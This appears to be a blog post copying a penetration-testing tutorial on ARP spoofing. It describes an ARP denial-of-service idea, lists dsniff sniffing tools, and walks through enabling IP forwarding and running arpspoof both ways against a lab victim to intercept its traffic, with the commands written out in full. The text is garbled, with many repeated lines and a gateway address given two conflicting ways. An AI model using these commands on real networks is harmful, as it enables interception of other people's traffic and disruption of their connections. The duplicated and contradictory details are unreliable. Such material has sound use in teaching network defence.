DENIAL OF SERVICE ATTACKS
Another attack that is possible with ARP spoofing is a denial-of-service attack. The attack works by associating the victim router’s IP to an IP that does not exist, thereby denying the victim access to the Internet: when the victim tries to connect to the Internet, he will reach a nonexisting place. The attack is performed by sending a spoofed ARP reply to the victim’s router’s MAC address that does not exist. Again, in a real penetration testing environment, you would rarely perform these types of attacks, and you will be more focused on launching the ARP spoofing attack.
TOOLS OF THE TRADE
Now, let’s talk about some of the popular tools that could be used to perform Man in the Middle attacks.
DSNIFF
Dsniff is called the Swiss army knife of command line ARP spoofing tools. It includes many tools to sniff various types of traffic. The most popular of them is ARP spoof, which would be demonstrated next. Dsniff is not developed or updated any more, but the tool still works and is great for performing Man in the middle attacks.
The set of tools include the following:
The set of tools include the following:
Arpspoof—Used for poisoning the ARP cache by forging ARP replies
Mailsnarf—Used to sniff e-mail messages sent from protocols like SMTP and POP
Msgsnaf—Sniffs all the IM messaging conversations
Webspy—Used to sniff all the URLs that a victim has visited via his browser and later use
to open it in our browser
Urlsnarf—Sniffs all the URLs
Macof—Used to perform a MAC flooding attack
Mailsnarf—Used to sniff e-mail messages sent from protocols like SMTP and POP
Msgsnaf—Sniffs all the IM messaging conversations
Webspy—Used to sniff all the URLs that a victim has visited via his browser and later use
to open it in our browser
Urlsnarf—Sniffs all the URLs
Macof—Used to perform a MAC flooding attack
USING ARP SPOOF TO PERFORM MITM ATTACKS
Before we perform a man in the middle attack, we need to enable IP forwarding so that the traffic could be forwarded to the destination. In order to enable it, we will use the following command:
echo 1 >/proc/sys/net/ipv4/ip_forward
echo 1 >/proc/sys/net/ipv4/ip_forward
We can confirm that port forwarding is enabled by using the cat command to display the contents of the ip _ forward file. “1” means that IP forwarding is enabled; “0” means it’s disabled.
Now that we have enabled IP forwarding, we need to gather the following information to
perform an man in the middle attack:
1. Attacker’s IP
2. Victim’s IP
3. Default gateway
Now that we have enabled IP forwarding, we need to gather the following information to
perform an man in the middle attack:
1. Attacker’s IP
2. Victim’s IP
3. Default gateway
ATTACKER’S IP—THIS WILL BE THE IP ADDRESS OF MY BACKTRACK MACHINE, WHICH IS 192.168.75.138.
VICTIM’S IP—MY VICTIM IS A WINDOWS XP MACHINE, WHICH HAS AN IP 192.168.75.142.
DEFAULT GATEWAY—THE DEFAULT GATEWAY IS THE IP ADDRESS OF MY ROUTER, WHICH IS 192.168.75.142.
Next, we would take a note of the victim’s MAC addresses associated with each of them.
We can view the MAC addresses in the ARP cache:
From this ARP cache, we can see that we have the MAC address of the default gateway
(192.168.75.2) and our machine (192.168.75.138). So what we would like to do is to tell the
default gateway that the victim’s IP address is associated with our MAC address and vice versa.
Let’s try ARP spoof to do this job.
We can view the MAC addresses in the ARP cache:
From this ARP cache, we can see that we have the MAC address of the default gateway
(192.168.75.2) and our machine (192.168.75.138). So what we would like to do is to tell the
default gateway that the victim’s IP address is associated with our MAC address and vice versa.
Let’s try ARP spoof to do this job.
USAGE
The basic syntax for arpspoof is as follows:
arpspoof –i [Interface] –t [Target Host]
arpspoof –i [Interface] –t [Target Host]
In this case, our interface is “eth0,” and our targets are 192.168.75.2 (gateway) and
192.168.75.142 (victim). So our command would be as follows:
arpspoof –i eth0 –t 192.168.75.142 192.168.75.2
192.168.75.142 (victim). So our command would be as follows:
arpspoof –i eth0 –t 192.168.75.142 192.168.75.2
On taking a look at the ARP cache again, we figure out that the gateway MAC address has
been replaced with our MAC address. So anything that the victim sends to the gateway will be forwarded to us.
been replaced with our MAC address. So anything that the victim sends to the gateway will be forwarded to us.
We also need to issue the same command in a reverse manner because when we are in the
middle and we need to send ARP replies both ways.
arpspoof –I eth0 –t 192.168.75.2 192.168.75.142
middle and we need to send ARP replies both ways.
arpspoof –I eth0 –t 192.168.75.2 192.168.75.142
If we take a look at the ARP cache of the victim’s machine now, we will find our MAC address associated with both IP addresses (default gateway and victim).
No comments:
Post a Comment